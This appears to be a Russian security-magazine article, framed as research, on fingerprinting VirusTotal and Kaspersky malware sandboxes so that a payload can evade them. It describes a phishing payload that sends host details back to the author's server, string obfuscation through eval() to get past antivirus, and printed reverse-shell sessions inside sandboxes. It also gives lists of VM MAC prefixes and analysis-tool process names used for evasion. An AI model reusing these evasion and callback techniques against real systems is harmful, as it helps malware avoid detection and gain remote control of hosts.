В обход песочниц. Детектим сэндбоксы VirusTotal и Kaspersky, чтобы спрятать вредоносный код

Содержание статьи

• Идея по сбору информации о песочницах
• Анализ полученной информации
• Реализация
• Обфускация
• Тестируем!
• VirusTotal
• Kaspersky
• VirusTotal
• Kaspersky
• Вместо вывода

Как устро­ены анти­вирус­ные песоч­ницы, извес­тно лишь понас­лышке: вен­доры надеж­но хра­нят свои сек­реты. Что мы уви­дим, если попыта­емся заг­лянуть к ним под капот? В этой статье — резуль­таты экспе­римен­та по иссле­дова­нию сред ана­лиза вре­донос­ного ПО, вклю­чая VirusTotal. Мы написа­ли скрипт для обхо­да песоч­ниц и получи­ли reverse shell: теперь мы точ­но зна­ем, что там внут­ри.

Од­нажды мы решили про­вес­ти тес­товую фишин­говую ата­ку в нашей орга­низа­ции, что­бы под­нять уро­вень осве­дом­леннос­ти сот­рудни­ков. В роли нас­тояще­го «хакера» я решил пос­тро­ить всю инфраструк­туру сам. Зарегал под­дель­ный домен, под­нял свой поч­товый сер­вер, сер­вер для при­ема отсту­ка. И тут приш­ло вре­мя писать кли­ент­скую часть, а имен­но ту полез­ную наг­рузку, которая будет отправ­лять­ся поль­зовате­лю.

Для получе­ния исполня­емо­го фай­ла я исполь­зовал связ­ку Python + PyInstaller. Идея сос­тояла в том, что­бы соб­рать минимум информа­ции о хос­те и понять, кому из сот­рудни­ков он при­над­лежит. Основной информа­цией стал IP-адрес машины в локаль­ной сети пред­при­ятия, пос­коль­ку он никог­да не меня­ется и по нему мож­но выяс­нить, кто же все‑таки запус­тил «вре­донос».

warning

Статья написа­на в иссле­дова­тель­ских целях, име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Исполь­зование или рас­простра­нение ПО без лицен­зии про­изво­дите­ля может прес­ледовать­ся по закону.

При­мер информа­ции, которая пос­тупала на мой сер­вер, если кто‑то запус­кал исполня­емый файл:

Hostname: <hostname>
Version: <version_os>
Release: <number_release>
Architecture: <architecture>
Type machine: <type>
Network name: <network_name>
User: <run_user>
OS type: <windows/linux>
Local_ip: <local_ip>

На машинах орга­низа­ции, которую мы тес­тирова­ли, сто­ит анти­вирус­ное решение от ком­пании Kaspersky — Kaspersky Endpoint Security. Для его обхо­да я исполь­зовал воз­можность Python выпол­нять код, который переда­ется в виде стро­ки. При­веду при­мер.

Вот исходный код на Python для получе­ния OS type:

os_type = platform.system()

А так выг­лядит обфусци­рован­ный код:

command_crypt = b'kxb0x0fp4x03xe9Dxe0x01xd5Z}xc1x85xa42xc56x9fxc0x81xaftxe5x08k!x81xd5xccxf0'command_decrypt = func_decrypt(command_crypt, key_decrypt)os_type = eval(command_decrypt)

Ре­али­зация нес­ложная. Сна­чала мы шиф­руем все стро­ки кода с исполь­зовани­ем фун­кции шиф­рования, затем исполь­зуем их в ито­говом фай­ле, из которо­го будет получен исполня­емый файл. В нем содер­жится код с такой струк­турой:

По­лучен­ный исполня­емый файл я помес­тил на сер­вер. В зависи­мос­ти от передан­ного в зап­росе User-Agent скрипт переда­вал­ся под нуж­ную ОС. Ког­да поль­зователь перехо­дил по фишин­говой ссыл­ке, ему отправ­лялся архив, замас­кирован­ный под файл .xls, пос­ле чего выпол­нялся редирект на реаль­ный сайт ком­пании, что­бы было менее подоз­ритель­но.

Так вот, еще до того, как я выг­рузил файл на сер­вер, я уже начал получать отсту­ки от непонят­ных для меня хос­тов. Вот при­мер одно­го из таких:

Hostname: DESKTOP-HESL6H8
Version: 10.0.18362
Release: 10
Architecture: (’64bit’, ‘WindowsPE’)
Type machine: AMD64
Network name: DESKTOP-HESL6H8
User: G58gQ
OS type: Windows
Local_ip: 10.16.202.175

Сра­зу бро­сает­ся в гла­за стран­ное имя поль­зовате­ля, как буд­то бы сге­нери­рован­ное. Единс­твен­ная «утеч­ка» мог­ла про­изой­ти с машины, на которой я тес­тировал обход анти­виру­са Kaspersky. Тог­да я не стал обра­щать вни­мания на это, пос­коль­ку анти­вирус все рав­но не ругал­ся на мой файл. И я бла­гопо­луч­но забил на этот факт до недав­него вре­мени, пока не заин­тересо­вал­ся обхо­дом песоч­ниц.

Идея по сбору информации о песочницах

Пред­положи­тель­но тог­да я получал отсту­ки из песоч­ниц Kaspersky, которые ана­лизи­рова­ли файл с неиз­вес­тной сиг­натурой. Поэто­му я решил: раз при­ходят зап­росы, зна­чит, у песоч­ниц есть дос­туп в интернет и он не бло­киру­ется. Если усо­вер­шенс­тво­вать скрипт с reverse shell, что­бы не ловить­ся прос­то по сиг­натуре, мож­но поп­робовать полазить по такой песоч­нице. Осно­ву для реали­зации этой идеи я взял с сай­та revshells.com.

Для экспе­римен­тов исполь­зовалась машина с белым IP. Я ском­пилиро­вал файл, и анти­вирус пос­ле пары под­клю­чений его ней­тра­лизо­вал. А я стал ждать. И… ничего, я так и не получил кон­некта.

Но при заг­рузке прог­раммы на VirusTotal вир­туаль­ные сре­ды все‑таки поз­воля­ют вза­имо­дей­ство­вать с хос­том пос­ле под­клю­чения:

root@hostname:~# nc -lvnp 8080
Listening on 0.0.0.0 8080

Connection received on 34.86.36.138 49171
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:UsersazureDownloads>
PS C:UsersazureDownloads> dir
dir
PS C:UsersazureDownloads> cd ..
cd ..
PS C:Usersazure> dir
dir

Directory: C:Usersazure

Mode LastWriteTime Length Name

d—— 3/31/2022 5:04 AM .idlerc
d—— 1/6/2023 10:44 AM .ms-ad
d-r— 3/25/2022 4:09 PM Contacts
d-r— 3/25/2022 6:25 PM Desktop
d-r— 3/25/2022 4:09 PM Documents
d-r— 5/5/2025 8:45 AM Downloads
d-r— 3/25/2022 4:09 PM Favorites
d-r— 3/25/2022 4:09 PM Links
d-r— 3/25/2022 4:09 PM Music
d-r— 3/25/2022 4:09 PM Pictures
d-r— 3/25/2022 4:09 PM Saved Games
d-r— 3/25/2022 4:09 PM Searches
d-r— 3/25/2022 4:09 PM Videos

PS C:Usersazure> Get-Process
Get-Process

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
115 9 15448 15812 0.64 932 0 audiodg
31 5 1080 3348 0.02 2168 1 conhost
35 5 1140 3748 0.02 2444 1 conhost
31 5 1080 3344 0.00 2460 1 conhost
31 5 1076 3348 0.03 2560 1 conhost
31 5 1076 3344 0.02 2648 1 conhost
31 5 1076 3344 0.00 2668 1 conhost
31 5 1080 3312 0.02 2788 1 conhost
31 5 1080 3316 0.00 2812 1 conhost
434 11 1840 4080 0.86 328 0 csrss
325 15 2876 5900 1.19 384 1 csrss

…

79 7 1416 5280 0.06 2056 0 unsecapp
81 10 1460 4728 0.64 376 0 wininit
112 9 2692 7520 1.77 424 1 winlogon
182 11 3532 9852 0.13 584 0 WmiPrvSE
124 9 2280 6820 0.05 1836 0 WmiPrvSE
133 9 2464 7236 0.14 2744 0 WmiPrvSE
439 32 9896 27188 0.83 2484 0 wmpnetwk

PS C:Usersazure> exit

root@hostname:~# nc -lvnp 8080
Listening on 0.0.0.0 8080
Connection received on 34.45.100.89 49681
ls
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:UsersBrunoDesktop> ls

Directory: C:UsersBrunoDesktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/5/2025 2:59 PM EEGWXUHVUG
d----- 3/5/2025 2:59 PM EFOYFBOLXA
d----- 3/5/2025 2:59 PM EOWRVPQCCS
d----- 3/5/2025 2:59 PM EWZCVGNOWT

`…

-a---- 3/5/2025 2:59 PM 1026 PWCCAWLGRE.pdf
-a---- 3/5/2025 2:59 PM 1026 QCFWYSKMHA.jpg
-a---- 5/6/2025 12:56 AM 49495 reverse.exe
-a---- 3/5/2025 2:59 PM 1026 SFPUSAFIOL.xlsx
-a---- 3/5/2025 2:59 PM 1026 SUAVTZKNFL.png

PS C:UsersBrunoDesktop> exit

В ито­ге я решил исполь­зовать так­тику, как при про­веде­нии фишин­говой ата­ки, а имен­но — исполь­зовать скрипт для сбо­ра информа­ции о сис­теме и отправ­ки дан­ных на сер­вер.

По­нят­но, что тех дан­ных, которые я собирал в изна­чаль­ном скрип­те, явно малова­то, поэто­му я усо­вер­шенс­тво­вал прог­рамму, и теперь она собира­ет сле­дующие парамет­ры:

OS type: Version: Release: Architecture: Type machine: Network name: User: Hostname: Local ip: System Date: System boot time: Uptime: System hardware: System File: Directory: C:/Windows: Directory: C:/Program Files: Directory: C:/Program Files (x86): Directory: C:/ProgramData: Directory: C:/Windows/System32: Directory: C:/Windows/SysWOW64: Directory: C:/Windows/Temp: Directory: C:/Users: User File: User directory: Directory: Downloads: Directory: Desktop: Directory: Pictures: Directory: Videos: Directory: Music: Directory: AppDataLocalTemp: Process Data:

Так­же я собирал информа­цию о сис­теме c помощью команд PowerShell, исполь­зуя модуль subprocess:

systeminfoipconfig /allnet userGet-WmiObject Win32_ComputerSystemGet-ServiceGet-WmiObject Win32_VideoControllerGet-CimInstance Win32_LogicalDisk -Filter "DriveType=3" | Select-Object `DeviceID, @{Name="Size(GB)";Expression={"{0:N2}" -f ($_.Size / 1GB)}}, @{Name="Free(GB)";Expression={"{0:N2}" -f ($_.FreeSpace / 1GB)}},@{Name="Used(GB)";Expression={"{0:N2}" -f (($_.Size - $_.FreeSpace) / 1GB)}} www

По­ка скрип­ты кру­тились в дро­бил­ках песоч­ниц, я поис­кал в интерне­те информа­цию об обхо­де этих самых песоч­ниц. В ито­ге мне пон­равились эти статьи:

• Де­тек­тим вир­туал­ки

• Де­тект песоч­ницы. Учим­ся опре­делять, работа­ет ли при­ложе­ние в sandbox-изо­ляции

• Как песок сквозь паль­цы: могут ли вре­доно­сы обой­ти Sandbox и как они это дела­ют

Мно­гие идеи я буду брать из этих ста­тей, так что мой код по боль­шей час­ти не уни­кален.

Анализ полученной информации

Ни­же при­веде­на таб­лица с дан­ными, по которой мы будем в пер­вую оче­редь опре­делять сре­ду.

Бро­сает­ся в гла­за, что у некото­рых хос­тов явно проб­лемы с CPU и MEM. Так­же мы видим, что некото­рые машины край­не недол­го находят­ся в Uptime, а у дру­гих слиш­ком мало запущен­ных про­цес­сов. Все это кос­венно может сви­детель­ство­вать о вир­туали­зации. Дан­ных от песоч­ниц Kaspersky я не получил: анти­вирус ни в какую не хотел счи­тать мой файл злов­редным.

В ито­ге я решил про­верить свою прог­рамму с помощью динами­чес­кого ана­лиза на их сай­те opentip.kaspersky.com. И как ока­залось, исполня­емый файл, получен­ный с исполь­зовани­ем связ­ки Python 3.12 + PyInstaller, прос­то не может запус­тить­ся в их песоч­нице.

И даже с уче­том того, что файл содер­жит reverse shell, ана­лиз показы­вает, что файл безопа­сен.

В общем, я вер­нулся на Python 3.7 и поп­робовал писать код на нем. Теперь прог­рамма ана­лизи­рова­лась нор­маль­но. Вот дан­ные, которые я получил.

Но получить с хос­тов дан­ные, похожие на те, что при­ходи­ли при про­веде­нии тес­товой фишин­говой ата­ки, мне не уда­лось. И толь­ко ког­да я оста­вил одни коман­ды PowerShell, мне наконец при­лете­ли отсту­кива­ния, которые были схо­жи, по край­ней мере hostname и username напоми­нали те, что я уви­дел в пер­вый раз. К сожале­нию, коман­да Get-Process почему‑то не отра­бота­ла, и информа­ции о количес­тве запущен­ных про­цес­сов мне получить не уда­лось.

Как вид­но, эти хос­ты тоже стра­дают от нех­ватки CPU и MEM.

Те­перь копа­ем глуб­же: нам нуж­ны MAC-адре­са. По ним так­же мож­но понять, что прог­рамма запуще­на в вир­туаль­ной сре­де. На этом ловят­ся хос­ты WIN-*. Вот MAC-адре­са, которые будем искать:

{{0x00, 0x50, 0x56}, "VMware ESX 3, Server, Workstation, Player"},{{0x00, 0x0C, 0x29}, "VMware ESX 3, Server, Workstation, Player"},{{0x00, 0x05, 0x69}, "VMware ESX 3, Server, Workstation, Player"},{{0x00, 0x1с, 0x14}, "VMware ESX 3, Server, Workstation, Player"},{{0x00, 0x03, 0xff}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x0d, 0x3a}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x50, 0xf2}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x7c, 0x1e, 0x52}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x12, 0x5a}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x15, 0x5d}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x17, 0xfa}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x28, 0x18, 0x78}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x7c, 0xed, 0x8d}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x1d, 0xd8}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x22, 0x48}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x25, 0xae}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x60, 0x45, 0xbd}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0xdc, 0xb4, 0xc4}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},{{0x00, 0x1c, 0x42}, "Parallels Desktop, Workstation, Server, Virtuozzo"},{{0x00, 0x0f, 0x4b}, "Virtual Iron 4"},{{0x00, 0x16, 0x3e}, "Red Hat Xen | Oracle VM | XenSource | Novell Xen"},{{0x08, 0x00, 0x27}, "Sun xVM VirtualBox"},

А вот про­цес­сы, по которым мож­но понять, что скрипт запущен в вир­туаль­ной сре­де или ана­лизи­рует­ся в дебаг­гере:

// Иконка VirtualBox в трее гостевой ОСTEXT("VBoxTray.exe"),// Служба VirtualBox Guest AdditionsTEXT("VBoxService.exe"),TEXT("vboxservice.exe"),// Драйвер VirtualBox GuestTEXT("vboxguest.sys"),// VMware ToolsTEXT("vmtoolsd.exe"),TEXT("vmwaretray.exe"),TEXT("vmwareuser.exe"),TEXT("vmsrvc.exe"),TEXT("vmhgfs.sys"),TEXT("vmware-vmx.exe"),TEXT("vmware-authd.exe"),// Hyper-VTEXT("vmicvss.exe"),// TEXT("vmms.exe"), // Был обнаружен в реальной машине, закомментированоTEXT("vmmem.exe"),TEXT("vmwp.exe"),// QEMUTEXT("qemu-system-x86_64.exe"),TEXT("qemu-vm-guest.exe"),// ParallelsTEXT("prl_vm_app.exe"),TEXT("prl_tools.exe"),TEXT("prl_cc.exe"),TEXT("SharedIntApp.exe"),// Драйвер мыши виртуальной машиныTEXT("vmmouse.sys"),// Xen Virtualization environmentTEXT("xenservice.exe"),// Windows SandboxTEXT("WindowsSandbox.exe"),// SandboxieTEXT("SandboxieRpcSs.exe"),TEXT("SandboxieDcomLaunch.exe"),TEXT("SbieSvc.exe"),TEXT("SbieCtrl.exe"),// Comodo SandboxTEXT("SxIn.exe"),// Process Monitor — анализ поведенияTEXT("procmon.exe"),// Обнаружен в процессах одной из песочниц VirusTotalTEXT("VmRemoteGuest.exe"),// Windows Debugging ToolsTEXT("ntsd.exe"),TEXT("windbg.exe"),// IDA ProTEXT("idaq.exe"),TEXT("idag.exe"),// x64dbg/x32dbgTEXT("x64dbg.exe"),TEXT("x32dbg.exe"),

И тут меня заин­тересо­вал вывод коман­ды

Get-WmiObject Win32_VideoController

А имен­но вот такие стро­ки:

Name Description PNPDeviceID

Со­бираю информа­цию с хос­тов:

Real PC: Description : AMD Radeon(TM) Vega 10 Graphics PNPDeviceID : PCIVEN_1002&DEV_15DD&SUBSYS_512217AA&REV_D04&35FEB52A&0&0041 Description : Intel(R) UHD Graphics 730 PNPDeviceID : PCIVEN_8086&DEV_4692&SUBSYS_D0001458&REV_0C3&11583659&0&10 Kaspersky: С сайта анализатора: Hostname: ELZ-8K4JW2UL3QY OS: Windows 10 Name : Microsoft Basic Display Adapter Description : Microsoft Basic Display Adapter PNPDeviceID : PCIVEN_1AE0&DEV_A001&SUBSYS_00011AE0&REV_013&13C0B0C5&0&18 Hostname: art-PC OS: Windows 7 Name : Standard VGA Graphics Adapter Description : Standard VGA Graphics Adapter PNPDeviceID : PCIVEN_1234&DEV_1111&SUBSYS_11001AF4&REV_023&1 Файлы, аналогичные файлам при проведении тестового фишинга: Hostname: DESKTOP-09L7V90 OS: Windows 10 Name : Microsoft Basic Display Adapter Description : Microsoft Basic Display Adapter PNPDeviceID : PCIVEN_1234&DEV_1111&SUBSYS_11001AF4&REV_003&13C0B0C5&0&10 Hostname: DESKTOP-NL2CM8W OS: Windows 10 Name : Microsoft Basic Display Adapter Description : Microsoft Basic Display Adapter PNPDeviceID : PCIVEN_1234&DEV_1111&SUBSYS_11001AF4&REV_003&13C0B0C5&0&10 Hostname: DESKTOP-WSP0LAK OS: Windows 10 Name : Microsoft Basic Display Adapter Description : Microsoft Basic Display Adapter PNPDeviceID : PCIVEN_1234&DEV_1111&SUBSYS_11001AF4&REV_003&13C0B0C5&0&10 VirusTotal: Hostname: WIN-5E07COS9ALR OS: Windows 10 Name : Microsoft Hyper-V Video Description : Microsoft Hyper-V Video PNPDeviceID : VMBUS{DA0A7802-E377-4AAC-8E77-0558EB1073F8}{5620E0C7-8062-4DCE-AEB7-520C7EF76171} Hostname: WIN-QIUREVVK5FL OS: Windows 7 Name : Microsoft Hyper-V Video Caption : Microsoft Hyper-V Video PNPDeviceID : VMBUS{DA0A7802-E377-4AAC-8E77-0558EB1073F8}{5620E0C7-8062-4DCE-AEB7-520C7EF76171} Hostname: 715575 OS: Windows 10 Name : AD59MKMM Description : CMPMV5 PNPDeviceID : PCIVEN_15AD&DEV_0405&SUBSYS_040515AD&REV_003&61AAA01&0&78 Hostname: 061544 OS: Windows 10 Данные отсутствуют (команда не выполнилась) Hostname: 424505 OS: Windows 10 Name : X9387726 Description : AE27H7US NPDeviceID : PCIVEN_15AD&DEV_0405&SUBSYS_040515AD&REV_003&61AAA01&0&78 Hostname: azure-PC OS: Windows 7 Name : Standard VGA Graphics Adapter Description : Standard VGA Graphics Adapter PNPDeviceID : PCIVEN_1B36&DEV_0100&SUBSYS_11001AF4&REV_053&2 Hostname: azure-PC OS: Windows 7 Name : Standard VGA Graphics Adapter Description : Standard VGA Graphics Adapter PNPDeviceID : PCIVEN_1B36&DEV_0100&SUBSYS_11001AF4&REV_053&2 Hostname: 00900BC83803 OS: Windows 10 Name : Intel(R) UHD Graphics 630 Description : Microsoft Basic Display Adapter PNPDeviceID : PCIVEN_1234&DEV_5678&SUBSYS_9101112&REV_013&ABCDE&0&11 Hostname: COMPUTER-9GV0UZ OS: Windows 10 Name : Microsoft Basic Display Adapter Description : Microsoft Basic Display Adapter PNPDeviceID : PCIVEN_1AE0&DEV_A001&SUBSYS_00011AE0&REV_013&13C0B0C5&0&18 Hostname: MZLTRR848050884 OS: Windows 10 Name : Microsoft Basic Display Adapter Description : Microsoft Basic Display Adapter PNPDeviceID : PCIVEN_8086&DEV_0412&SUBSYS_2AF7103C&REV_063&21436425&0&10

Как вид­но, есть пов­торя­ющиеся зна­чения, а так­же име­на и опи­сания, похожие на дефол­тные или сге­нери­рован­ные. Допол­нитель­но к выводу о том, что при про­веде­нии тес­тирова­ния по фишин­гу мне при­лета­ли отсту­ки от Kaspersky, говорят оди­нако­вые VEN и DEV, получен­ные с сай­та ана­лиза­тора и отку­да‑то еще (отку­да при­лета­ют стран­ные отсту­кива­ния со стран­ных хос­тов, я так и не понял).

Источник: xakep.ru